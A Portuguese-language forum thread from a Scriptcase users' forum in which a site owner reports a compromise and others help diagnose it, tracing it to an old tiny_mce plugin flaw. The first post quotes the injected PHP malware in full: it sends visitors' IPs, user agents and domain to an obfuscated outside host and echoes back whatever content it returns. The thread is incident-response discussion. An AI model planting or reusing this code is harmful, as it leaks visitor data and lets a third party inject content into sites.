Autor Tópico: Invasão no arquivo Scriptcase  (Lida 579 vezes)

adrianacombat

  • Avançado
  • ****
  • Mensagens: 369
    • Email
Invasão no arquivo Scriptcase
« Online: Maio 02, 2018, 11:17:29 am »
Bom dia pessoal!

Gostaria de uma possivel ajuda de vcs.

O Host do scriptcase me informou que dentro de 2 diretorios meus estão com problemas e podem ter sido invadidos, são eles:
/home/wagnerbo/public_html/appwb/
/home/wagnerbo/public_html/scaseprod52/

E que em todos os arquivos dos diretórios em questão exite o conteúdo:
-----------------------------------------------------------------------------------------
Citar
Em todos os arquivos dos diretórios em questão exite o conteúdo:
<?php
session_start();
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&$
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTT$
$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}

O qual o base64 aponta para hotlogupdate.com.

Não possuo mai este código aberto no scriptcase para mexer dentro do sistema.

O que posso fazer?

Agradeço desde já a ajuda de vcs.

Bruno P

  • Novato
  • *
  • Mensagens: 16
  • WW Development - Consultoria em dsv. WEB
    • Email
Re:Invasão no arquivo Scriptcase
« Responder #1 Online: Maio 02, 2018, 11:48:20 am »
Todos os fontes foram substituídos por este conteúdo, ou o conteúdo foi "apendado" ao inicio fonte?

WW Development
Consultoria em Desenvolvimento Web
bprece@gmail.com

adrianacombat

  • Avançado
  • ****
  • Mensagens: 369
    • Email
Re:Invasão no arquivo Scriptcase
« Responder #2 Online: Maio 02, 2018, 11:51:30 am »
Bruno,

Estou verificando os arquivos e eu nem estou achando. Perguntei ao Host da Scriptcase aonde tenho o sistema e ainda não responderam.
Se for como falaram em todos os arquivos eu já teria achado.

adrianacombat

  • Avançado
  • ****
  • Mensagens: 369
    • Email
Re:Invasão no arquivo Scriptcase
« Responder #3 Online: Maio 02, 2018, 11:56:36 am »
Bruno, achei este arquivo agora: cript.inc.php

Tem a base64 que esta informando no arquivo, mas não o link para o hotlogupdate.com

Renomeie o arq para.php

adrianacombat

  • Avançado
  • ****
  • Mensagens: 369
    • Email
Re:Invasão no arquivo Scriptcase
« Responder #4 Online: Maio 02, 2018, 12:16:02 pm »
Achei o arquivo.

Agora não sei se é só retirá-lo apena, ou se retirar vai dar problema na aplicação.

Este arquivo está dentro da raiz da aplicação appwb/

Segue em anexo pra ver se me ajudam.
Basta renomear o arquivo para .php

Agradeço a ajuda

flaviomorais

  • Avançado
  • ****
  • Mensagens: 406
    • Email
Re:Invasão no arquivo Scriptcase
« Responder #5 Online: Maio 02, 2018, 01:29:13 pm »
Poderia informar a versão do PHP e a do seu SC que está em produção ?


Achei o arquivo.

Agora não sei se é só retirá-lo apena, ou se retirar vai dar problema na aplicação.

Este arquivo está dentro da raiz da aplicação appwb/

Segue em anexo pra ver se me ajudam.
Basta renomear o arquivo para .php

Agradeço a ajuda

Alexandre Pereira Bühler

  • Expert
  • *****
  • Mensagens: 2274
  • Focalize as oportunidades e não os obstáculos.
    • Simão & Bühler Ltda
    • Email
Re:Invasão no arquivo Scriptcase
« Responder #6 Online: Maio 02, 2018, 06:10:33 pm »
Adriana,
Versão antigas do Scriptcase tem um furo de segurança.
Procure no Fórum Scriptcase: invasão.
Se sua versão for afetada por este furo de segurança recomendo atualizar.

PS: Achei: http://www.scriptcase.com.br/forum/index.php/topic,14017.msg73537.html#msg73537
Cito o que o Yuri falou:
Prezados, bom dia!

O problema foi corrigido na release 8.1.053. Versão disponivel para download e atualização.

Para os que realizaram uma publicação do tipo típica, será necessário publicar novamente. Para os que publicam de forma avançada, só precisa atualizar o ambiente de produção no servidor.

O problema estava no plugin que não era mais usado no Scriptcase.

Uma dica: Nos diretórios onde ficam armazenados os arquivos de upload é sempre bom remover a permissão de execução.

Agradecemos a colaboração de todos e estaremos andando juntos para a cada dia melhorar mais o Scriptcase.
Obrigado!
--
Alexandre Pereira Bühler
https://www.simaoebuhler.com.br
Hospedagem compartilhada. Temos servidores dedicados.
Linux User: 397546 -> https://www.linuxcounter.net
Grupo Telegram -> https://t.me/scriptcasebr

Ronyan Alves

  • Administrator
  • Expert
  • *****
  • Mensagens: 979
Re:Invasão no arquivo Scriptcase
« Responder #7 Online: Maio 03, 2018, 10:41:59 am »
Identificamos que o processo estava sendo gerado pelo arquivo em:
../_lib/prod/third/tiny_mce/themes/simple/skins/o2k7/o2k7.php

Possivelmente, uma falha do plugin ou do tema utilizado na versão do tiny_mce utilizado na versão 5.2 do Scriptcase.

--

Ronyan Alves
Equipe Scriptcase